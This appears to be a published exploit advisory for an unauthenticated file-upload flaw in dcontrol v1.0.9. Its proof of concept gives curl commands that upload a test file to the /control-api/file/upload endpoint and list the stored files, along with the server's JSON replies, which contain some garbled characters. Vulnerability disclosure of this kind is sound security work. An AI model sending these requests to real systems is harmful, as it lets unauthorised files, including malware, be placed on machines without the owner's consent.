## https://sploitus.com/exploit?id=PACKETSTORM:219224
# Exploit Title: dcontrol v1.0.9 - Unauthenticated Arbitrary File Upload
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dcontrol
# Software Link:
https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
# Version: 1.0.9
# Tested on: Windows 10, Windows 11
# Description:
dcontrol v1.0.9 is vulnerable to unauthenticated arbitrary file upload via
the
/control-api/file/upload endpoint. The application does not require any
authentication and accepts file uploads from any source. While the upload
directory is fixed to a configured location (default: ./files), an attacker
can
upload arbitrary file types including executables, scripts, and malware.
# Proof of Concept 1: Basic File Upload
Create a test file and upload it:
echo "UNAUTHENTICATED UPLOAD TEST" > upload_test.txt
curl -X POST -F "file=@upload_test.txt" "
http://TARGET_IP:666/control-api/file/upload"
Response:
{"code":200,"msg":"ๆไฝๆๅ","data":"upload_test.txt"}
File is located in c:\Users\<USER Name>\Downloads\files
Verify uploads using the list endpoint:
curl "http://TARGET_IP:666/control-api/file/list" | jq
{
"code": 200,
"msg": "ๆไฝๆๅ",
"data": [
{
"name": "upload_test.txt",
"size": 28,
"sizes": "28 B",
"time": "2026-04-17 21:43:43",
"timestamp": 1776487423317
}
]
}